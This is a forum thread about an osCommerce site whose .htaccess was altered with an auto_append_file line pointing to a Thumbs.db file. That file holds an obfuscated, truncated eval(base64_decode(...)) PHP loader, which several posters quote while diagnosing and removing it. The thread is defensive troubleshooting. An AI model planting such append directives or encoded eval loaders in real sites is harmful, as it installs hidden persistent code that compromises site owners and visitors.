torrent Posted June 8, 2011 Share Posted June 8, 2011 This has happened two times now - my site goes down and I get an "internal server error" message. The first time it happened I noticed that my .htaccess file had been modified the day before so I opened it and found just the code "php_value auto_append_file /home/content/b/1/8/b******/html/Thumbs.db". Just a blank page with that code. The second time it happened it left the original .htaccess code and just wrote it at the bottom of the page. I did a search of my entire site and cannot find a string in my code that says anything like that which might be causing it... I'm sure changing the permissions on it would fix it but I would like to find the cause if possible, thanks! Link to comment Share on other sites More sharing options...
ozEworks Posted June 8, 2011 Share Posted June 8, 2011 I suggest you contact your hosting company for support on this. They can possible look at logs to determine how the file was updated. It is possible some kind of hack has occored. Link to comment Share on other sites More sharing options...
burt Posted June 8, 2011 Share Posted June 8, 2011 Kym is correct, this is a hack - definitely. The auto_append_file hack is quite well known and is a much "better" hack than is usually seen. What happens is this; a file is uploaded to your site, or the server (usually deep in /usr/). This file would contain the hack code, or link spam or whatever. Usually obfuscated and can be cookied. The auto_append_file command adds the content of the file onto each .php page, and if cookied can be set to do all sorts of things (eg, show links for 1 visit once per day)...making it very hard to detect. Link to comment Share on other sites More sharing options...
NodsDorf Posted June 8, 2011 Share Posted June 8, 2011 I've dealt with this before myself. At time the time I worked with the host who said no person had logged in ftp or cpanel to the site except me. Which lead me to believe it was a security hole in the persons site's Oscommerce that wasn't fixed. After doing all the security updates to the site and cleaning the site it appeared again about 2 weeks later. Turns out that there was a seemlessly harmless file in the catalog called account_history_full.php I found this wasn't a part of any add-on or normal oscommerce file, it was an encoded eval base64 code that was getting called remotely. Killing that and setting the permission on the .httacces to 444 seemed to fix this issue, or atleast I haven't had them say anything. Hope that helps, Don Link to comment Share on other sites More sharing options...
torrent Posted July 8, 2011 Author Share Posted July 8, 2011 Thank you for your replys. I have just been dealing with it by 444ing my .htaccess file, but now that i know its something malicious causing it i will look into it further. It seems every time i fix a security hole in oscommerce i get hacked through another one. These idiots have too much time on their hands. Thanks again! Link to comment Share on other sites More sharing options...
KojiOhashi Posted September 6, 2011 Share Posted September 6, 2011 Sorry, I'm not good at English. The same phenomenon is caused in the WEB-site that I have. I found plural "Thumbs.db" in a WEB-site. a certain malice PHP cord is written in there. PHP cord is encrypted, and decoding is difficult, but is as follows. ----------------------------------------------------------------------- <?php @eval(base64_decode( "aWYgKCRldmFsYnNmcm1iR3ZaWERGICE9IDU... ...skhbGJzZnJtYkd2WlhERiA9NTU2OTM7fQ==")); ?> ----------------------------------------------------------------------- Please check a certain "Thumbs.db" in your WEB-site. And, The update date/time(time stamp) of "Thumbs.db" is the same as ".htaccess". I think that this problem dissolves by deleting "Thumbs.db". thanks. Link to comment Share on other sites More sharing options...
NodsDorf Posted September 7, 2011 Share Posted September 7, 2011 Sorry, I'm not good at English. The same phenomenon is caused in the WEB-site that I have. I found plural "Thumbs.db" in a WEB-site. a certain malice PHP cord is written in there. PHP cord is encrypted, and decoding is difficult, but is as follows. ----------------------------------------------------------------------- <?php @eval(base64_decode( "aWYgKCRldmFsYnNmcm1iR3ZaWERGICE9IDU... ...skhbGJzZnJtYkd2WlhERiA9NTU2OTM7fQ==")); ?> ----------------------------------------------------------------------- Please check a certain "Thumbs.db" in your WEB-site. And, The update date/time(time stamp) of "Thumbs.db" is the same as ".htaccess". I think that this problem dissolves by deleting "Thumbs.db". thanks. Any and All eval(base64_decode( .....) Is hack code. It needs removed. You might also see a php prepend value to your .htaccess file. That line needs removed. Thumbs.db is a windows image caching file (anybody who uses vista or later will see them all over their system's folders) They are safe to delete in all cases and have no legitmate reason to be on a Linux server. After you clean everything you need to check all your files, you should do all the security updates here. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.